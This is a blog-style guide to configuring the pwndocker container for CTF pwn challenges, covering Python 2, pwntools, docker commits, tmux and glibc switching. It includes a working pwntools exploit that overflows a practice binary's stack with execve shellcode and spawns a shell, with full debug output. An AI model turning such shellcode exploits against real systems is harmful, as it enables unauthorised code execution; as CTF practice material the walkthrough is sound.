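Configuring a pwn environment from scratch: tuning the pwndocker configuration
1. Background
Related post: "Configuring a Kali 2023 environment from scratch: setting up a pwn debugging environment" (CSDN blog)
After installing pwndocker earlier I found it awkward to use, so I looked into it and changed some settings until it met the needs of solving challenges.
2. Problems encountered and how they were solved
1. The pwndocker container has no Python 2 environment. Many pwn challenge solutions need Python 2, so it has to be added.
Installing Python 2 inside the pwndocker container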
┌──(holyeyes㉿kali2023)-[~/Re]
└─$ cd 2
┌──(holyeyes㉿kali2023)-[~/Re/2]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes:
root@446f4b4dbc7d:/ctf/work# ls
2 wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.py
root@446f4b4dbc7d:/ctf/work# curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
root@446f4b4dbc7d:/ctf/work# ls
2 get-pip.py wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.py
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Installing collected packages: pip, setuptools, wheel
Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.37.1
root@446f4b4dbc7d:/ctf/work# sudo apt install python2-pip
bash: sudo: command not found
root@446f4b4dbc7d:/ctf/work# apt install python2-pip
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package python2-pip
root@446f4b4dbc7d:/ctf/work# apt-get install python-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
Note, selecting 'python-dev-is-python2' instead of 'python-dev'
The following additional packages will be installed:
libpython2-dev libpython2.7 libpython2.7-dev python-is-python2
python2-dev python2.7-dev
The following NEW packages will be installed:
libpython2-dev libpython2.7 libpython2.7-dev python-dev-is-python2
python-is-python2 python2-dev python2.7-dev
0 upgraded, 7 newly installed, 0 to remove and 89 not upgraded.
Need to get 3,809 kB of archives.
After this operation, 17.7 MB of additional disk space will be used.
Do you want to continue? [Y/n]
root@446f4b4dbc7d:/ctf/work# pip2 install setuptools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Requirement already satisfied: setuptools in /usr/local/lib/python2.7/dist-packages (44.1.1)
root@446f4b4dbc7d:/ctf/work# pip2 install pwntools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Installing collected packages: psutil, six, python-dateutil, sortedcontainers, MarkupSafe, mako, idna, certifi, chardet, urllib3, requests, pygments, colored-traceback, pycparser, cffi, pynacl, bcrypt, enum34, ipaddress, cryptography, paramiko, unicorn, capstone, ropgadget, intervaltree, pyelftools, scandir, typing, pathlib2, pysocks, plumbum, rpyc, pyserial, pyparsing, packaging, pwntools
Successfully installed MarkupSafe-1.1.1 bcrypt-3.1.7 capstone-5.0.1 certifi-2021.10.8 cffi-1.15.1 chardet-4.0.0 colored-traceback-0.3.0 cryptography-3.3.2 enum34-1.1.10 idna-2.10 intervaltree-3.1.0 ipaddress-1.0.23 mako-1.1.6 packaging-20.9 paramiko-2.12.0 pathlib2-2.3.7.post1 plumbum-1.7.2 psutil-5.9.7 pwntools-4.11.1 pycparser-2.21 pyelftools-0.29 pygments-2.5.2 pynacl-1.4.0 pyparsing-2.4.7 pyserial-3.5 pysocks-1.7.1 python-dateutil-2.8.2 requests-2.27.1 ropgadget-7.4 rpyc-4.1.5 scandir-1.10.0 six-1.16.0 sortedcontainers-2.4.0 typing-3.10.0.0 unicorn-2.0.1.post1 urllib3-1.26.18
Saving the configured pwndocker container as an image
┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker ps
[sudo] password for holyeyes:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
446f4b4dbc7d skysider/pwndocker "/sbin/my_init" 7 hours ago Up 7 hours 0.0.0.0:23946->23946/tcp, :::23946->23946/tcp pwn_test
┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker commit 446f4b4dbc7d pwn_test:v1
┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker image ls
REPOSITORY TAG IMAGE ID CREATED SIZE
pwn_test v1 202c1a800e25 5 hours ago 5.25GB
skysider/pwndocker latest 26c0315bd8d9 2 months ago 5GB
keen4n/pwndocker1604 latest 4ff3687f7371 4 years ago 2.52GB
Update docker-compose.yml
version: '3'
services:
  pwn:
    container_name: pwn_test1604
    image: pwn_test
    security_opt:
      - seccomp:unconfined
    cap_add:
      - SYS_PTRACE
    ports:
      - "23947:23947"
    volumes:
      - /home/holyeyes/Re:/ctf/work
Update run.sh
docker-compose up -d
docker exec -it pwn_test1604 /bin/bash
┌──(holyeyes㉿kali2023)-[~/pwndocker1604]
└─$ sudo ./run.sh
[sudo] password for holyeyes:
Pulling pwn (pwn_test:)...
ERROR: The image for the service you're trying to recreate has been removed. If you continue, volume data could be lost. Consider backing up your data before continuing.
Continue with the new image? [yN]
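However, the experiment above failed, so the environment has to be saved some other way. Note that the compose file names the image pwn_test with no tag, which Compose resolves to pwn_test:latest, while the committed image is tagged pwn_test:v1; that is why the log shows Compose trying to pull pwn (pwn_test:) rather than using the local image.
2. tmux configuration does not take effect
Split left/right: ctrl+B+%
Split top/bottom: ctrl+B+"
Enable the mouse: ctrl+B+:set -g mouse on
None of this worked for a long time. It turned out that inside the virtual machine ctrl has to be replaced with alt, i.e.:
Split left/right: alt+B+%
Split top/bottom: alt+B+"
Enable the mouse: alt+B+:set -g mouse on
3. The container's default libc is the Ubuntu 20.04 one and needs to be switched to the 16.04 one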
from pwn import *
p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})
See the pwndocker usage notes at https://github.com/skysider/pwndocker, quoted here:
included glibc
Default compiled glibc path is /glibc.
2.19 —— ubuntu 12.04 default libc version
2.23 —— ubuntu 16.04 default libc version
2.24 —— introduce vtable check in file struct
2.27 —— ubuntu 18.04 default glibc version
2.31 —— ubuntu 20.04 default glibc version(built-in)
2.28~2.30, 2.33~2.36 —— latest libc versions
Q&A
How to run in custom libc version?
cp /glibc/2.27/64/lib/ld-2.27.so /tmp/ld-2.27.so
patchelf --set-interpreter /tmp/ld-2.27.so ./test
LD_PRELOAD=./libc.so.6 ./test
or
from pwn import *
p = process(["/path/to/ld.so", "./test"], env={"LD_PRELOAD":"/path/to/libc.so.6"})
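I wrote a pwn script to test this:
from pwn import *
# Start ./test under the bundled glibc 2.23 loader and libc
p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})
# This second call rebinds p: everything below talks to the challenge binary,
# which is started with the container's default libc
p = process('./wdb_2018_3rd_soEasy')
#p = remote('node5.buuoj.cn',27285)
context.log_level='debug'
context.arch='i386'
# The program prints an address after '->'; parse it as hex
p.recvuntil('->')
buf = int(p.recvuntil('\n', drop=True),16)
log.info('buf:'+hex(buf))
p.recvuntil('what do you want to do?')
shellcode = asm(shellcraft.sh())
print len(shellcode)
# Payload: shellcode, padding up to 76 bytes, then the printed address
pl = ''
pl += shellcode
pl += (76-len(pl))*'a'
pl += p32(buf)
p.sendline(pl)
p.interactive()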
┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes:
root@446f4b4dbc7d:/ctf/work# cd 2
root@446f4b4dbc7d:/ctf/work/2# ls
exp.py get-pip.py wdb_2018_3rd_soEasy
root@446f4b4dbc7d:/ctf/work/2# python2 exp.py
[+] Starting local process '/glibc/2.23/64/lib/ld-2.23.so': pid 1051
[+] Starting local process './wdb_2018_3rd_soEasy': pid 1053
[DEBUG] Received 0x38 bytes:
'Hei,give you a gift->0xffeaf870\n'
'what do you want to do?\n'
[*] buf:0xffeaf870
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling
.section .shellcode,"awx"
.global _start
.global __start
_start:
__start:
.intel_syntax noprefix
.p2align 0
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push 11 /* 0xb */
pop eax
int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-sp9wDe/step2 /tmp/pwn-asm-sp9wDe/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-sp9wDe/step3 /tmp/pwn-asm-sp9wDe/step4
44
[DEBUG] Sent 0x51 bytes:
00000000 6a 68 68 2f 2f 2f 73 68 2f 62 69 6e 89 e3 68 01 │jhh/│//sh│/bin│··h·│
00000010 01 01 01 81 34 24 72 69 01 01 31 c9 51 6a 04 59 │····│4$ri│··1·│Qj·Y│
00000020 01 e1 51 89 e1 31 d2 6a 0b 58 cd 80 61 61 61 61 │··Q·│·1·j│·X··│aaaa│
00000030 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
00000040 61 61 61 61 61 61 61 61 61 61 61 61 70 f8 ea ff │aaaa│aaaa│aaaa│p···│
00000050 0a │·│
00000051
[*] Switching to interactive mode
$
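An added example (not part of the original post and not pwndocker's own code): a helper that reads the ELF class byte of the target and builds the loader argv and LD_PRELOAD environment for a chosen version under /glibc, so that a 32-bit binary like the one tested above is paired with a matching loader and a missing libc is reported instead of silently falling back to the default one. It assumes the 32-bit libraries live under /glibc/<version>/32/lib in the same layout as the 64-bit path shown above and that the loader is named ld-<version>.so; the names elf_bits, glibc_launch and demo, and the sample tree, are constructed for illustration.

```python
import os
import shutil
import tempfile

ELF_MAGIC = b"\x7fELF"
EI_CLASS = 4                     # index of the class byte inside e_ident
CLASS_DIRS = {1: "32", 2: "64"}  # ELFCLASS32 / ELFCLASS64 -> sub-directory name


def elf_bits(path):
    """Return "32" or "64" according to the ELF header of `path`."""
    with open(path, "rb") as f:
        ident = bytearray(f.read(EI_CLASS + 1))
    if len(ident) <= EI_CLASS or bytes(ident[:4]) != ELF_MAGIC:
        raise ValueError("%s is not an ELF file" % path)
    if ident[EI_CLASS] not in CLASS_DIRS:
        raise ValueError("%s: unknown EI_CLASS %d" % (path, ident[EI_CLASS]))
    return CLASS_DIRS[ident[EI_CLASS]]


def glibc_launch(binary, version, root="/glibc"):
    """Build (argv, env) that run `binary` under the bundled glibc `version`.

    Assumed layout: <root>/<version>/<32|64>/lib/{ld-<version>.so,libc.so.6}.
    Raises if either file is missing rather than using the system libc.
    """
    lib = os.path.join(root, version, elf_bits(binary), "lib")
    loader = os.path.join(lib, "ld-%s.so" % version)
    libc = os.path.join(lib, "libc.so.6")
    for needed in (loader, libc):
        if not os.path.isfile(needed):
            raise IOError("missing %s" % needed)
    return [loader, binary], {"LD_PRELOAD": libc}


def demo():
    """Run glibc_launch on a constructed tree and a constructed 32-bit ELF stub."""
    top = tempfile.mkdtemp()
    try:
        lib32 = os.path.join(top, "glibc", "2.23", "32", "lib")
        os.makedirs(lib32)
        for name in ("ld-2.23.so", "libc.so.6"):
            open(os.path.join(lib32, name), "wb").close()
        target = os.path.join(top, "stub32")
        with open(target, "wb") as f:
            f.write(ELF_MAGIC + b"\x01" + b"\x00" * 11)  # e_ident, ELFCLASS32
        argv, env = glibc_launch(target, "2.23", root=os.path.join(top, "glibc"))
        # Paths are reported relative to the constructed tree so they are stable
        return ([os.path.relpath(a, top) for a in argv],
                {k: os.path.relpath(v, top) for k, v in env.items()})
    finally:
        shutil.rmtree(top)


if __name__ == "__main__":
    print(demo())
    # With pwntools inside the container:
    #   argv, env = glibc_launch("./wdb_2018_3rd_soEasy", "2.23")
    #   p = process(argv, env=env)
```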